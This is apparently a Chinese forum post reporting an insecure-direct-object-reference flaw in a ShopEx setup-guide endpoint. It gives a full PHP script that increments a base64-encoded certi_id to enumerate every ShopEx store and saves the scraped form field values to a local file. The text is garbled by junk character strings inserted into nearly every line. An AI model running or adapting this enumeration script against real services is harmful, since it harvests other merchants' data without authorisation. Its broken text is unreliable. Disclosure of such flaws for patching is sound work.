|
|
简要描述:( m* q. U6 H; t1 P
ShopEx某接口缺陷,可遍历所有网站
' a0 e4 S9 W6 r+ Z. K6 y* M/ b( {详细说明:
a+ S( }0 Z+ i+ L问题出现在shopex 网店使用向导页面 / h/ O! q$ ]9 F' `
7 M/ M( G4 z5 I) k
3 T( Q9 d# Q. P) x
8 p( S7 [; h e( L, {" V' ihttp://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=1 b4 Z" H- l* i* H
% N* b9 Y! C+ ^7 W. M
7 |- n# X- l/ M$ `0 l- t2 D
7 Z) S$ w% |6 A/ Erefer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
4 E: m4 X! }; {7 x, K$ m5 O
% ~+ \ x9 q1 c% `) B) K- ^; ?
7 O' i' i C7 ~) E* Z1 O
我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
`. J. {. l, a- R5 r1 v7 T% i6 z- w7 l$ H8 T
* C5 {1 _& {( i
6 S3 G. N, x( k6 u' y' c<?php3 ]1 Z* [( J3 |* E
/ L6 M) j1 G8 P; g5 m' p for ($i=1; $i < 10000; $i++) { //遍历
" _* z3 ^1 _5 z& y
5 _& A9 p8 \/ _8 s( e1 o ShowshopExD($i);
; c1 p( U8 s1 s, V& A0 e. `; x
8 U; C; T* |) r% t( Y }% l- e( f' t0 v5 f1 T: W( n
5 M2 i& y8 J) E. A) F# m
function ShowshopExD($cid) {
2 ~* d' s' c/ F$ B7 t) }- k- M) D8 K, G, C
$url='http://guide.ecos.shopex.cn/step2.php';# {: M# ^& v; w: L& t: [) h
5 x) N0 ?7 d: N' w+ s) y7 z
$refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');! x2 U. h. `6 j% _
4 \ [2 \) p% ~ $url = $url.'?refer='.$refer;7 q9 B- u# ^1 [
- {# h/ W$ M" R# T3 P( @
$ch = curl_init($url);
~/ H+ r) X) a! W$ U m- h* d- P. b' R7 c+ X
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;# g9 S: @2 K! \( C7 D' Y
5 G- T$ Z3 d3 c, x
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
2 }6 \/ A7 x; \' m5 g' c6 r- Z+ a( g1 W! |6 q `! n# U4 H
$result = curl_exec($ch);! G" J% y/ A [1 s3 E* ^) K
& s6 Z2 G% C( Z/ N+ t: x% R0 r $result = mb_convert_encoding($result, "gb2312", "UTF-8");
`& t4 B% z7 S# i' b# u
% {. e2 T, K- A( y" R | if(strpos($result,$refer)). q- X8 @( p/ w: L
( j: h1 N0 Q7 G: I( w {
8 \( U2 f( b, L |; U
4 ^" E0 Y1 k6 T1 K6 _. b: M $fp = fopen("c:/shopEx.txt",'ab'); //保存文件
$ X% b3 s% V) D& D9 O& S4 S( }7 `9 P
preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);; ~! u' m- I4 m# g r, l" b
8 C/ o$ y6 }9 o% M6 t
foreach ($value[1] as $key) {
5 u* I+ {: j, A, ^ z% O. A4 Q4 [0 q) V7 w/ Y8 J
preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);! W' g8 ]/ r$ Y
& q- y4 e; u/ L. ~3 n% F echo $res[1][0].':'.$res[3][0]."\r\n";# r/ \" P+ W7 `
6 Y* `1 m( t" l5 h9 f
$col =$res[1][0].':'.$res[3][0]."\r\n"; . | J* i" b' K7 f, I c. X
7 X0 Y6 P) V/ l
fwrite($fp, $col, strlen($col));
c, E- q* Q, z R$ \0 \/ ] D( R' d; Y! w) C( p$ I
}
\9 u/ ]" P1 [4 G$ x2 t5 g6 ~2 y- h
echo '--------------------------------'."\r\n";4 W# W1 t7 D/ _9 T$ n* X8 w( b
# x5 B$ m# B6 d2 D. G
fclose($fp);
m* n: H' v* J$ _5 ^% E/ q/ V
9 o. F" h7 S. h: Y5 `7 u# q }( m7 c" E! Y) ]+ s% h/ Y- `. ^
1 ^/ `8 h# V- M/ [5 D1 @
flush();
: b( |+ n- _8 a/ D( }" D1 B& j9 k$ x* S8 E+ ]) {: n
curl_close($ch);
5 P1 E! S r- x4 j" @+ ]$ v7 @' G' d4 U
}
, z$ H6 n# `2 P. T; m4 X0 t% \9 E# i, {$ x
?>
6 U; i7 ^+ g9 h% A0 G1 y漏洞证明:
& E- L5 B; C$ h" l4 _& W. Jhttp://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg' a4 Q3 n, g5 E9 `1 a
refer换成其他加密方式, S- ^1 k5 `2 X/ K# n
|
|